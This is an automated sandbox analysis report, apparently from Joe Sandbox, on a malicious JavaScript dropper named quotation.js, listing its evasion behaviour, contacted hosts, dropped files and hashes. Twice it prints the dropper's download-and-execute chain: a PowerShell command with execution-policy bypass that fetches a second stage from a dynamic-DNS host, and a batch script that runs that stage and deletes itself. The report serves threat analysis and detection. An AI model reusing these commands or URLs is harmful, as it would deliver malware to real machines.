Source: Binary string: softy.pdbviceG source: powershell.exe, 0000000A.00000002.1784746433.00000234C1B8A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: CallSite.Target.pdbon.resources] source: powershell.exe, 0000000A.00000002.1785472340.00000234C1D60000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'http://timmy02.duckdns.org/uploads/186024/Quotation.vbs.php' -OutFile 'C:\Users\user~1\AppData\Local\Temp\Update.php' "
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_00007FFAAC1500AD pushad ; iretd 10_2_00007FFAAC1500C1
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_00007FFAAC154D9C rdtsc 10_2_00007FFAAC154D9C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4560
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5295
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7184 | Thread sleep count: 4560 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7188 | Thread sleep count: 5295 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7256 | Thread sleep time: -11990383647911201s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7344 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Local
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\Desktop\desktop.ini
Source: wscript.exe, 00000001.00000002.1792296152.00000274B409D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1792296152.00000274B3FF9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: powershell.exe, 0000000A.00000002.1785472340.00000234C1D60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_00007FFAAC154D9C rdtsc 10_2_00007FFAAC154D9C

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\wscript.exe | Network Connect: 104.26.3.16 443
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'http://timmy02.duckdns.org/uploads/186024/Quotation.vbs.php' -OutFile 'C:\Users\user~1\AppData\Local\Temp\Update.php' "
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tempScript.bat" "
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c "C:\Users\user~1\AppData\Local\Temp\Update.php"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wscript.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information122
Scripting
Valid Accounts1
Windows Management Instrumentation
122
Scripting
111
Process Injection
1
Masquerading
OS Credential Dumping11
Security Software Discovery
Remote ServicesData from Local System1
Web Service
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
Exploitation for Client Execution
1
DLL Side-Loading
1
DLL Side-Loading
1
Disable or Modify Tools
LSASS Memory1
Process Discovery
Remote Desktop ProtocolData from Removable Media1
Encrypted Channel
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts3
PowerShell
Logon Script (Windows)Logon Script (Windows)21
Virtualization/Sandbox Evasion
Security Account Manager21
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared Drive1
Ingress Tool Transfer
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
Process Injection
NTDS1
Application Window Discovery
Distributed Component Object ModelInput Capture2
Non-Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
Obfuscated Files or Information
LSA Secrets2
File and Directory Discovery
SSHKeylogging113
Application Layer Protocol
Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading
Cached Domain Credentials13
System Information Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
Behavior Graph ID: 1502676 | Sample: quotation.js | Start date: 02/09/2024 | Architecture: WINDOWS | Score: 100
Domains in graph: timmy02.duckdns.org (41.105.186.133, ports 80, 49707, 49723; ALGTEL-ASDZ, Algeria), contacted by powershell.exe; rentry.co (104.26.3.16, ports 443, 49702; CLOUDFLARENETUS, United States), contacted by wscript.exe
Sample-level signatures: Multi AV Scanner detection for domain / URL; Antivirus detection for URL or domain; Sigma detected: WScript or CScript Dropper; 4 other signatures; Uses dynamic DNS services (timmy02.duckdns.org); Connects to a pastebin service (likely for C&C) (rentry.co)
wscript.exe started; dropped file C:\Users\user\AppData\...\tempScript.bat (ASCII); signatures: System process connects to network (likely due to code injection or exploit); Wscript starts Powershell (via cmd or directly); Windows Scripting host queries suspicious COM object (likely to drop second stage); Suspicious execution chain found
cmd.exe started by wscript.exe; signatures: Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); Bypasses PowerShell execution policy
powershell.exe, taskkill.exe, conhost.exe and cmd.exe started by cmd.exe; powershell.exe connects to timmy02.duckdns.org

No Antivirus matches
Source | Detection | Scanner | Label
rentry.co | 1% | Virustotal |
timmy02.duckdns.org | 4% | Virustotal |
Source | Detection | Scanner | Label
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
https://go.micro | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://nuget.org/nuget.exe | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
https://aka.ms/pscore68 | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
http://timmy02.duckdns.org/uploads/186024/Quotation.vbs.phpP | 100% | Avira URL Cloud | malware
https://rentry.co/6yg2yfkf/raw9 | 0% | Avira URL Cloud | safe
http://timmy02.duckdns.org/uploads/186024/quotation.vbs.php | 100% | Avira URL Cloud | malware
http://www.apache.org/licenses/LICENSE-2.0.html | 0% | Avira URL Cloud | safe
http://timmy02.duckdns.org/uploads/186024/Quo | 100% | Avira URL Cloud | malware
https://rentry.co/ | 0% | Avira URL Cloud | safe
https://rentry.co:443/6yg2yfkf/raw | 0% | Avira URL Cloud | safe
http://www.apache.org/licenses/LICENSE-2.0.html | 0% | Virustotal |
https://rentry.co/6yg2yfkf/raw | 0% | Avira URL Cloud | safe
https://rentry.co/ | 1% | Virustotal |
http://timmy02.duckdns.org | 100% | Avira URL Cloud | malware
https://rentry.co/6yg2yfkf/rawD6 | 0% | Avira URL Cloud | safe
https://github.com/Pester/Pester | 0% | Avira URL Cloud | safe
http://timmy02.duckdns.org/uploads/186024/Quotation.vbs.phpCommonProgramFiles=C: | 100% | Avira URL Cloud | malware
http://timmy02.duckdns.org | 4% | Virustotal |
https://rentry.co:443/6yg2yfkf/raw | 4% | Virustotal |
https://rentry.co/6yg2yfkf/raw | 4% | Virustotal |
http://timmy02.duckdns.org/uploads/186024/Quo | 5% | Virustotal |
https://github.com/Pester/Pester | 1% | Virustotal |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
rentry.co | 104.26.3.16 | true | true | | unknown
timmy02.duckdns.org | 41.105.186.133 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://timmy02.duckdns.org/uploads/186024/Quotation.vbs.php | true | | unknown
https://rentry.co/6yg2yfkf/raw | true | Virustotal 4%; Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://timmy02.duckdns.org/uploads/186024/Quotation.vbs.phpP | wscript.exe, 00000001.00000002.1794047481.00000274B6A06000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://nuget.org/NuGet.exe | powershell.exe, 0000000A.00000002.1767404550.00000234AB056000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1781643384.00000234B9712000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1781643384.00000234B9855000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://rentry.co/6yg2yfkf/raw9 | wscript.exe, 00000001.00000002.1792296152.00000274B3FF9000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://timmy02.duckdns.org/uploads/186024/quotation.vbs.php | powershell.exe, 0000000A.00000002.1766329922.00000234A7BD0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 0000000A.00000002.1767404550.00000234A98CC000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000000A.00000002.1767404550.00000234A98CC000.00000004.00000800.00020000.00000000.sdmp | false | Virustotal 0%; Avira URL Cloud: safe | unknown
http://timmy02.duckdns.org/uploads/186024/Quo | powershell.exe, 0000000A.00000002.1767404550.00000234AAC98000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1767404550.00000234AAC66000.00000004.00000800.00020000.00000000.sdmp | true | Virustotal 5%; Avira URL Cloud: malware | unknown
https://go.micro | powershell.exe, 0000000A.00000002.1767404550.00000234AA2CC000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://rentry.co/ | wscript.exe, 00000001.00000002.1792296152.00000274B3FF9000.00000004.00000020.00020000.00000000.sdmp | false | Virustotal 1%; Avira URL Cloud: safe | unknown
https://contoso.com/ | powershell.exe, 0000000A.00000002.1781643384.00000234B9855000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 0000000A.00000002.1767404550.00000234AB056000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1781643384.00000234B9712000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1781643384.00000234B9855000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/License | powershell.exe, 0000000A.00000002.1781643384.00000234B9855000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://rentry.co:443/6yg2yfkf/raw | wscript.exe, 00000001.00000002.1792296152.00000274B3FF9000.00000004.00000020.00020000.00000000.sdmp | false | Virustotal 4%; Avira URL Cloud: safe | unknown
https://contoso.com/Icon | powershell.exe, 0000000A.00000002.1781643384.00000234B9855000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://timmy02.duckdns.org | powershell.exe, 0000000A.00000002.1767404550.00000234AA9D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1767404550.00000234AAC92000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1767404550.00000234AAC6B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1767404550.00000234AAC78000.00000004.00000800.00020000.00000000.sdmp | true | Virustotal 4%; Avira URL Cloud: malware | unknown
https://rentry.co/6yg2yfkf/rawD6 | wscript.exe, 00000001.00000002.1792296152.00000274B3FF9000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 0000000A.00000002.1767404550.00000234A96A1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 0000000A.00000002.1767404550.00000234A96A1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 0000000A.00000002.1767404550.00000234A98CC000.00000004.00000800.00020000.00000000.sdmp | false | Virustotal 1%; Avira URL Cloud: safe | unknown
http://timmy02.duckdns.org/uploads/186024/Quotation.vbs.phpCommonProgramFiles=C: | powershell.exe, 0000000A.00000002.1766329922.00000234A7BD0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1766381913.00000234A7BF0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1766329922.00000234A7BD4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1785472340.00000234C1D60000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1766480583.00000234A7CE7000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
41.105.186.133 | timmy02.duckdns.org | Algeria | 36947 | ALGTEL-ASDZ | true
104.26.3.16 | rentry.co | United States | 13335 | CLOUDFLARENETUS | true
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1502676
Start date and time: 2024-09-02 07:46:14 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 48s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 23
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: quotation.js
Detection: MAL
Classification: mal100.troj.expl.evad.winJS@11/5@2/2
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 2
• Number of non-executed functions: 3
Cookbook Comments:
• Found application associated with file extension: .js
• Excluded processes from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe, UsoClient.exe
• Excluded domains from analysis (whitelisted): login.live.com, slscr.update.microsoft.com, settings-win.data.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 5428 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
01:47:18 | API Interceptor | 235x Sleep call for process: powershell.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.26.3.16 | Quote.js | malicious | Unknown |
104.26.3.16 | SecuriteInfo.com.Win64.MalwareX-gen.9087.16441.exe | malicious | Unknown |
104.26.3.16 | SecuriteInfo.com.Win64.MalwareX-gen.11541.5330.exe | malicious | Unknown |
104.26.3.16 | SecuriteInfo.com.Win64.MalwareX-gen.9087.16441.exe | malicious | Unknown |
104.26.3.16 | CV.vbs | malicious | Xmrig |
104.26.3.16 | system47.exe | malicious | XWorm |
104.26.3.16 | file.exe | malicious | LummaC, Go Injector, LummaC Stealer, SmokeLoader |
104.26.3.16 | file.exe | malicious | LummaC, Go Injector, LummaC Stealer, SmokeLoader |
104.26.3.16 | S982i1J0Uk.msi | malicious | Unknown |
104.26.3.16 | cliente.exe | malicious | Unknown |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
rentry.co | Quote.js | malicious | Unknown | 104.26.3.16
rentry.co | SecuriteInfo.com.Win64.MalwareX-gen.9087.16441.exe | malicious | Unknown | 104.26.3.16
rentry.co | SecuriteInfo.com.Win64.MalwareX-gen.11541.5330.exe | malicious | Unknown | 104.26.3.16
rentry.co | SecuriteInfo.com.Win64.MalwareX-gen.9087.16441.exe | malicious | Unknown | 104.26.3.16
rentry.co | SecuriteInfo.com.Win64.MalwareX-gen.11541.5330.exe | malicious | Unknown | 104.26.2.16
rentry.co | CV.vbs | malicious | Xmrig | 104.26.3.16
rentry.co | SecuriteInfo.com.Trojan.GenericFCA.Script.33276.27996.26811.exe | malicious | Unknown | 104.26.2.16
rentry.co | system47.exe | malicious | XWorm | 104.26.3.16
rentry.co | file.exe | malicious | LummaC, Go Injector, LummaC Stealer, SmokeLoader | 104.26.3.16
rentry.co | FpiUD4nYpj.exe | malicious | LummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT | 104.26.2.16
timmy02.duckdns.org | Quote.js | malicious | Unknown | 197.207.170.98
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ALGTEL-ASDZ | mirai.dbg.elf | malicious | Mirai | 154.255.38.95
ALGTEL-ASDZ | mirai.ppc.elf | malicious | Mirai | 197.114.85.5
ALGTEL-ASDZ | sora.arm7.elf | malicious | Mirai | 105.100.195.49
ALGTEL-ASDZ | sora.sh4.elf | malicious | Mirai | 105.103.188.186
ALGTEL-ASDZ | Quote.js | malicious | Unknown | 197.207.170.98
ALGTEL-ASDZ | sora.m68k.elf | malicious | Unknown | 105.103.188.172
ALGTEL-ASDZ | jew.x86.elf | malicious | Unknown | 41.102.197.126
ALGTEL-ASDZ | xd.arm7.elf | malicious | Mirai | 154.246.28.221
ALGTEL-ASDZ | KKveTTgaAAsecNNaaaa.mpsl.elf | malicious | Unknown | 197.207.194.80
ALGTEL-ASDZ | eQMWdrDEm7.elf | malicious | Unknown | 41.103.192.83
CLOUDFLARENETUS | 81bl0ZlcJ3.exe | malicious | LummaC, Stealc, Vidar | 188.114.97.3
CLOUDFLARENETUS | ejH1Ma9DnJ.exe | malicious | LummaC, Vidar | 188.114.96.3
CLOUDFLARENETUS | xnfvsO7kVN.exe | malicious | LummaC, Vidar | 188.114.97.3
CLOUDFLARENETUS | 3gqQI34mVq.exe | malicious | LummaC | 172.67.152.163
CLOUDFLARENETUS | file.exe | malicious | Unknown | 172.64.41.3
CLOUDFLARENETUS | Apocalypse.exe | malicious | LummaC, MicroClip | 172.67.175.170
CLOUDFLARENETUS | SecuriteInfo.com.Win32.CrypterX-gen.29312.2664.exe | malicious | AgentTesla | 172.67.74.152
CLOUDFLARENETUS | SecuriteInfo.com.Trojan.Locsyz.2.2D0.720.21943.32020.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.3
CLOUDFLARENETUS | PACIFIC ARGOSY PARTICULARS.pdf.scr.exe | malicious | AgentTesla | 104.26.12.205
CLOUDFLARENETUS | SSI Brilliant - SHIP PARTICULARS.docx.scr.exe | malicious | AgentTesla | 104.26.13.205
Match | Associated Sample Name / URL | Detection | Threat Name | Context
a0e9f5d64349fb13191bc781f81f42e1 | 81bl0ZlcJ3.exe | malicious | LummaC, Stealc, Vidar | 104.26.3.16
a0e9f5d64349fb13191bc781f81f42e1 | ejH1Ma9DnJ.exe | malicious | LummaC, Vidar | 104.26.3.16
a0e9f5d64349fb13191bc781f81f42e1 | xnfvsO7kVN.exe | malicious | LummaC, Vidar | 104.26.3.16
a0e9f5d64349fb13191bc781f81f42e1 | 3gqQI34mVq.exe | malicious | LummaC | 104.26.3.16
a0e9f5d64349fb13191bc781f81f42e1 | Apocalypse.exe | malicious | LummaC, MicroClip | 104.26.3.16
a0e9f5d64349fb13191bc781f81f42e1 | mLn7GEEpuS.exe | malicious | CryptOne, SmokeLoader, Stealc | 104.26.3.16
a0e9f5d64349fb13191bc781f81f42e1 | https://trk.pmifunds.com/y.z?l=http://security1.b-cdn.net&j=375634604&e=3028&p=1&t=h&D6EBE0CCEBB74CE191551D6EE653FA1E | malicious | HTMLPhisher | 104.26.3.16
a0e9f5d64349fb13191bc781f81f42e1 | V6n3oygctH.exe | malicious | CryptOne, SmokeLoader, Stealc | 104.26.3.16
a0e9f5d64349fb13191bc781f81f42e1 | agd42.exe | malicious | BlackMoon | 104.26.3.16
a0e9f5d64349fb13191bc781f81f42e1 | agd42.exe | malicious | BlackMoon | 104.26.3.16
                        No context
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 9434
Entropy (8bit): 4.928515784730612
Encrypted: false
SSDEEP: 192:Lxoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smAH:srib4ZIkjh4iUxsT6Ypib47
MD5: D3594118838EF8580975DDA877E44DEB
SHA1: 0ACABEA9B50CA74E6EBAE326251253BAF2E53371
SHA-256: 456A877AFDD786310F7DAF74CCBC7FB6B0A0D14ABD37E3D6DE9D8277FFAC7DDE
SHA-512: 103EA89FA5AC7E661417BBFE049415EF7FA6A09C461337C174DF02925D6A691994FE91B148B28D6A712604BDBC4D1DB5FEED8F879731B36326725AA9714AC53C
Malicious: false
Reputation: moderate, very likely benign file
Preview: PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 1.1940658735648508
Encrypted: false
SSDEEP: 3:NlllulJnp/p:NllU
MD5: BC6DB77EB243BF62DC31267706650173
SHA1: 9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
SHA-256: 5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
SHA-512: 91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
Malicious: false
Reputation: moderate, very likely benign file
Preview: @...e.................................X..............@..........

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Reputation: high, very likely benign file
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\System32\wscript.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 305
Entropy (8bit): 5.446129494019924
Encrypted: false
SSDEEP: 6:p56dz3jIW3Udpav2+ECEovQ980QO0cbjLh8JpH5uRDk5JOWPRmvugTv:ixIW7TpI980QpcjGLH5kkiWPRTgTv
MD5: 6BCE262A914E1606C864F6383A796ED7
SHA1: ECBD77FCBB596EFBAC410056EC5790A1B8812D33
SHA-256: 213B2AF8334B2E309F0472F30D7CA42351BFDF4B4359C9A751A29756E14E3545
SHA-512: E5A1A215E7CB3F4C26D62377F83B9C58AE294AFBCF8693A57CBCBFC8B80730F8CB0A1A16968247509F8D42AC9182A71E45585F60111C17F9EF15A963CA11D944
Malicious: true
Preview: @echo on..SETLOCAL..SET "cmdURL=http://timmy02.duckdns.org/uploads/186024/Quotation.vbs.php"..SET "cmdPath=%temp%\Update.php"..powershell -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri '%cmdURL%' -OutFile '%cmdPath%' "..cmd.exe /c "%cmdPath%"..taskkill /f /im wscript.exe..ENDLOCAL..DEL "%~f0"..

File type: Unicode text, UTF-16, little-endian text, with very long lines (709), with CRLF line terminators
Entropy (8bit): 4.230368219285672
TrID:
• Text - UTF-16 (LE) encoded (2002/1) 64.44%
• MP3 audio (1001/1) 32.22%
• Lumena CEL bitmap (63/63) 2.03%
• Corel Photo Paint (41/41) 1.32%
File name: quotation.js
File size: 3'316'916 bytes
MD5: e9dfe55aca773878308f2d4d6ad00c79
SHA1: 0066ce882b680471050a49ec800d32e47b3765ca
SHA256: d7c6eab85f93123d8bf4db0f5714d2d400d4f7fb93b1a79163ebaee7e72b515d
SHA512: a9e33a3bb0354f95db699a461060d777a952f68ca6bc847b17c9dc371e86d133167e4cc6f7274d035b1a52443a2f422bb6fe6101597df2a52599c6f4fb1c67b6
SSDEEP: 12288:T3Y6TzFLuglAgA1X+H/5J0pQhc6LhTdWzqxRAdrvdgIdN/dgLAgLcSq6SOgICSaN:O
TLSH: 80E5F2562AD61C9CB033BD0ACBEDE561DF5BB221250E6B9717A1038F01DB842DD8BC76
File Content Preview: ../.*.F.h.B.i.A.=.}.!.k.i.%.e.}.0.X.x.7.!.U.4.!.i.(.,.O.{.3.o.c.B.8.0.W.&._.n.r.>.k.0.&.].z.{.].T.R...<.Y.h.%.L.r.<.n.8.Z.0.y.:.V.n.V.M.>.O.w.#.u.1.e.1.W.O.a.%.).2.4.f.*./...../.*.N.b.y.k.g.=.w.8.u.Q.M.u.Q.|.?.2.T.0.D.^.).m.-.&.{.:.N.{.H.9.@.H.D.k.T.&.|.@
Icon Hash: 68d69b8bb6aa9a86
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 2, 2024 07:47:15.756586075 CEST | 49702 | 443 | 192.168.2.7 | 104.26.3.16
Sep 2, 2024 07:47:15.756620884 CEST | 443 | 49702 | 104.26.3.16 | 192.168.2.7
Sep 2, 2024 07:47:15.756829023 CEST | 49702 | 443 | 192.168.2.7 | 104.26.3.16
Sep 2, 2024 07:47:15.766387939 CEST | 49702 | 443 | 192.168.2.7 | 104.26.3.16
